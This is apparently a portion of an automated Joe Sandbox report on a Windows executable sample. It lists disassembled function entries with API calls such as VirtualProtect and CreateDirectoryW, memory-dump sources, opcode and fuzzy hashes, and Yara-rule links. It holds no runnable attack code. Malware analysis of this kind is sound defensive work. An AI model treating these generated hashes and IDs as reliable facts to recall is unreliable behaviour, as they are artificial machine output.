                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: 4587e17fa48296d688496d80f6f81b187376c9e5c9a74f9b6dabcf50ea5509bf
                                                                                    • Instruction ID: 6f61bd623c8cc07e7c4505036c174974097f4a563b8ca4771f07bdbd8698e3c9
                                                                                    • Opcode Fuzzy Hash: 4587e17fa48296d688496d80f6f81b187376c9e5c9a74f9b6dabcf50ea5509bf
                                                                                    • Instruction Fuzzy Hash: 1C31C571B186518EEA606F2DD5406B8E394AF26BD6F844131DB2C877D8DF2CE4C38628
                                                                                    Function 00007FF7B8EF241C Relevance: 3.1, APIs: 2, Instructions: 83COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Item_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1746051919-0
                                                                                    • Opcode ID: 110a3e0168afe95773353cf82e7d822e6073f87474c844f99897d9bb3f9c4f0b
                                                                                    • Instruction ID: 241831ee93d1bdce6eda7f907f44d876358f1c2bfa3c2356b5d3952b90174483
                                                                                    • Opcode Fuzzy Hash: 110a3e0168afe95773353cf82e7d822e6073f87474c844f99897d9bb3f9c4f0b
                                                                                    • Instruction Fuzzy Hash: 92310B61E1878245FA10AB29E455369F361FF967D4FD44231EB8C026DADF3CE5428748
                                                                                    Function 00007FF7B8F01E80 Relevance: 3.1, APIs: 2, Instructions: 76timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$BuffersFlushTime
                                                                                    • String ID:
                                                                                    • API String ID: 1392018926-0
                                                                                    • Opcode ID: 1daf210f7d1e71829005616e7aeefb4b91ac6c2890f93594a25159253e67cee3
                                                                                    • Instruction ID: 0586e0547302ae6475b547d8d056ee8c67e08262abbc8f877c64051256c6983f
                                                                                    • Opcode Fuzzy Hash: 1daf210f7d1e71829005616e7aeefb4b91ac6c2890f93594a25159253e67cee3
                                                                                    • Instruction Fuzzy Hash: 9C21D332F096469DEA61AF59E4003BAD7D0AF22796F944032CF5C0639AEE3CE4C7C214
                                                                                    Function 00007FF7B8F21180 Relevance: 3.1, APIs: 2, Instructions: 75memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • DloadMakePermanentImageCommit.DELAYIMP ref: 00007FF7B8F211F5
                                                                                    • VirtualProtect.KERNELBASE(?,?,?,?,00000000,00007FF7B8F20F76,?,?,?,00007FF7B8F2135D), ref: 00007FF7B8F2124E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CommitDloadImageMakePermanentProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1359380325-0
                                                                                    • Opcode ID: 6b00de01a77620eb2566597b12bcc0e6a9b18731db7cc15298825013cccac3b7
                                                                                    • Instruction ID: 44a7991bda42c5376463707f6f89e7cbb485f54ab4c50a745e30b8c2b15baffe
                                                                                    • Opcode Fuzzy Hash: 6b00de01a77620eb2566597b12bcc0e6a9b18731db7cc15298825013cccac3b7
                                                                                    • Instruction Fuzzy Hash: 35218531A096514AFE24AF4A9550279E2A0BF66B91F840071FF4D47B9CEE3CF583872C
                                                                                    Function 00007FF7B8F01F60 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFileLastPointer
                                                                                    • String ID:
                                                                                    • API String ID: 2976181284-0
                                                                                    • Opcode ID: 519d35b3cfcab39ddd00e55f368a9f3a7a84d20e149430486094a922609e6412
                                                                                    • Instruction ID: 4333a59f4d5a39e51f1a4323880aa7e43c64f652cf49f69cc65950d9fb46d55d
                                                                                    • Opcode Fuzzy Hash: 519d35b3cfcab39ddd00e55f368a9f3a7a84d20e149430486094a922609e6412
                                                                                    • Instruction Fuzzy Hash: E8119331A1864289EB60AF29E440669E260FB667A6F944331EB3D523DCCF3CD583C314
                                                                                    Function 00007FF7B8EF26C8 Relevance: 3.0, APIs: 2, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemRectTextWindow$Clientswprintf
                                                                                    • String ID:
                                                                                    • API String ID: 3322643685-0
                                                                                    • Opcode ID: a723af60c7717834335850277151bb43de5b00edbb168dd4e843ec77410905fb
                                                                                    • Instruction ID: 109666cbbce2d008f0a21bdad3518f8d139d60113d795c230dbb4166ea7a7264
                                                                                    • Opcode Fuzzy Hash: a723af60c7717834335850277151bb43de5b00edbb168dd4e843ec77410905fb
                                                                                    • Instruction Fuzzy Hash: B0017C31A0D38344FE55AB59A5153B9E692AFA3B80FC44038CE4D066EDDF7CE5878328
                                                                                    Function 00007FF7B8F0A244 Relevance: 3.0, APIs: 2, Instructions: 39COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString
                                                                                    • String ID:
                                                                                    • API String ID: 2948472770-0
                                                                                    • Opcode ID: f614b22a724d5105e42780bb6026b60baaeea42570bb6687910ca7acf2500620
                                                                                    • Instruction ID: 64140760c0bb40c901ac6dac3daf368a0e0b8a2ce2125360bbbd425886526877
                                                                                    • Opcode Fuzzy Hash: f614b22a724d5105e42780bb6026b60baaeea42570bb6687910ca7acf2500620
                                                                                    • Instruction Fuzzy Hash: 7D018471B04B4189E600AF4AE8404A9F760BBE6FC1F984135CF5C5372DDF38EA528398
                                                                                    Function 00007FF7B8F0E4C0 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7B8F0E515,?,?,?,?,00007FF7B8F04ADA,?,?,?,00007FF7B8F04A66), ref: 00007FF7B8F0E4C4
                                                                                    • GetProcessAffinityMask.KERNEL32 ref: 00007FF7B8F0E4D7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$AffinityCurrentMask
                                                                                    • String ID:
                                                                                    • API String ID: 1231390398-0
                                                                                    • Opcode ID: d17bd8fc7b5d7fb72044c82ec2a440248b441aa1e6cb4ae9273fc3d44df9392e
                                                                                    • Instruction ID: d7c8f02c585c817a2f85a26ed4237aa0e8eb04df0f3bf4200f47e11e5c2c27e9
                                                                                    • Opcode Fuzzy Hash: d17bd8fc7b5d7fb72044c82ec2a440248b441aa1e6cb4ae9273fc3d44df9392e
                                                                                    • Instruction Fuzzy Hash: AAE02B71B345428ADF19AF1DC4404E9E393BFD5B40FC48036E60B83A18EE3CE14A8B10
                                                                                    Function 00007FF7B8F21C20 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                    • String ID:
                                                                                    • API String ID: 1173176844-0
                                                                                    • Opcode ID: 120a8bd4e08339a9caf387951adf1e3567f013d17b0cb81f343632d9ff992fe9
                                                                                    • Instruction ID: 67357d672337338fc808548ace8479c6be8e560c7538235a4de343794a8933cf
                                                                                    • Opcode Fuzzy Hash: 120a8bd4e08339a9caf387951adf1e3567f013d17b0cb81f343632d9ff992fe9
                                                                                    • Instruction Fuzzy Hash: 9CE0BF74E9910749F9193A6915150F5C0400F3A376D981B30FB3D452CAAD1CF493413C
                                                                                    Function 00007FF7B8F2C7B8 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 485612231-0
                                                                                    • Opcode ID: 067109a98fe8f73c73c275788455a1b99817bc0bcda5e65c68cd19919d313a81
                                                                                    • Instruction ID: ac7373c01633436639dac679f104b48a9174c9db2a2a5fc4e35a41b194cc0606
                                                                                    • Opcode Fuzzy Hash: 067109a98fe8f73c73c275788455a1b99817bc0bcda5e65c68cd19919d313a81
                                                                                    • Instruction Fuzzy Hash: D9E08670F095038AFF087FBAE4451B4D190AF76B42F844034EB1D8635DDE2CE4434628
                                                                                    Function 00007FF7B8F10F80 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: 2205451d73314f089f10c95012f2468eeefa6838cfaabe1aa2d1fb2fbfb52d72
                                                                                    • Instruction ID: 2a1aea88a3429f6c0425727e1083ef67cdbb35e70a17a0e527b894229d52ac0b
                                                                                    • Opcode Fuzzy Hash: 2205451d73314f089f10c95012f2468eeefa6838cfaabe1aa2d1fb2fbfb52d72
                                                                                    • Instruction Fuzzy Hash: 0381AB72B05A8599EE08EF69D4441BCF264FB62F91F944231DB2D17689DF3CE4A2831C
                                                                                    Function 00007FF7B8EFDE44 Relevance: 1.7, APIs: 1, Instructions: 192COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00007FF7B8F02A30: CreateDirectoryW.KERNELBASE(?,?,?,00007FF7B8F00E19), ref: 00007FF7B8F02A7A
                                                                                      • Part of subcall function 00007FF7B8F02A30: CreateDirectoryW.KERNEL32 ref: 00007FF7B8F02AE2
                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF7B8EFE13F
                                                                                      • Part of subcall function 00007FF7B8F02680: GetFileAttributesW.KERNELBASE(?,?,?,?,00007FF7B8F0DDF6,?,?,?,00000000,?), ref: 00007FF7B8F026AB
                                                                                      • Part of subcall function 00007FF7B8F02680: GetFileAttributesW.KERNELBASE ref: 00007FF7B8F026FB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: AttributesCreateDirectoryFile$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1060281209-0
                                                                                    • Opcode ID: 4f488208d24f48c4134a6ce7762e9916bd53ea4e8de64273b674182c67c2f97a
                                                                                    • Instruction ID: fd76d84b1caab20202e168ea9437c9d178b2cfba3650bbf5fb63199ecfafd09b
                                                                                    • Opcode Fuzzy Hash: 4f488208d24f48c4134a6ce7762e9916bd53ea4e8de64273b674182c67c2f97a
                                                                                    • Instruction Fuzzy Hash: 0F819F62B0868359FA15AB2AD4503F9E791AFA7780F840131EB9D0779ACF3CE546C364
                                                                                    Function 00007FF7B8EFE148 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: c24b4b957891b8daaf9c9820b763521a00c91029f28a835607b4e6427143fd28
                                                                                    • Instruction ID: 05de5a24496d8f2f45879591595ad8bd44c05b3c200f4b9733b7abf3686e4a9e
                                                                                    • Opcode Fuzzy Hash: c24b4b957891b8daaf9c9820b763521a00c91029f28a835607b4e6427143fd28
                                                                                    • Instruction Fuzzy Hash: AA51A462A0878395FA50AF29D4443FDE751EB66789FC40132EB5C0B69ADF3CE586C324
                                                                                    Function 00007FF7B8F0A008 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: LoadString$_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 2323602097-0
                                                                                    • Opcode ID: 44d02123f5eafcb89c34793852cc349ab37801432cd1f59fb25af28c227c5c5c
                                                                                    • Instruction ID: 93180cd1bf1f5485fd095aa77164606ccc53475967e04d98a37ed9b6f027817f
                                                                                    • Opcode Fuzzy Hash: 44d02123f5eafcb89c34793852cc349ab37801432cd1f59fb25af28c227c5c5c
                                                                                    • Instruction Fuzzy Hash: C7519071A08B468DEA50EF1CD4401A9E361FBA6782F904236E75D437A9DF3CE582C728
                                                                                    Function 00007FF7B8EFDC48 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseFind_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1011579015-0
                                                                                    • Opcode ID: aee9e88fbafe18559b21cee89f736fecbb37199766dece3da5f4ff249e0cf7c4
                                                                                    • Instruction ID: 21bc231c36d0d4091484ae31380681eee8e8a7d9ee7aebb11fa47b41abcf1826
                                                                                    • Opcode Fuzzy Hash: aee9e88fbafe18559b21cee89f736fecbb37199766dece3da5f4ff249e0cf7c4
                                                                                    • Instruction Fuzzy Hash: 43516E22B0868585FA50AF2DD0403BDE761FFA6B84FC44231EB4D476A9CF3DD4428768
                                                                                    Function 00007FF7B8F00BA0 Relevance: 1.6, APIs: 1, Instructions: 115COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: 8927658b6a3073e77722e646f281a468b81d4e2315362bc9eaee1e1c128bcd40
                                                                                    • Instruction ID: 8ca5d0fffabf3f5ee4c6dd098c623defc3913902fefb419bbd613d4ec3d25470
                                                                                    • Opcode Fuzzy Hash: 8927658b6a3073e77722e646f281a468b81d4e2315362bc9eaee1e1c128bcd40
                                                                                    • Instruction Fuzzy Hash: B6412672B18A8589EB04AE1BE910379E251BB95BC1F848435EF5C47F4EDF3CD4528308
                                                                                    Function 00007FF7B8EF96DC Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: a93743ccdce25af2beae6dbf9cfa4a5e34c7a297851399ed47dace49b1b3ada0
                                                                                    • Instruction ID: 1a71715c8fd44fd219dbe750ff8201cf501603b06461771d0886e15d3e85b8c0
                                                                                    • Opcode Fuzzy Hash: a93743ccdce25af2beae6dbf9cfa4a5e34c7a297851399ed47dace49b1b3ada0
                                                                                    • Instruction Fuzzy Hash: BB41B362F1865158FB10BF69E4512EDE7A0AF66B98FC44131EF4D17689DE3CD0838328
                                                                                    Function 00007FF7B8F02314 Relevance: 1.6, APIs: 1, Instructions: 99COMMON
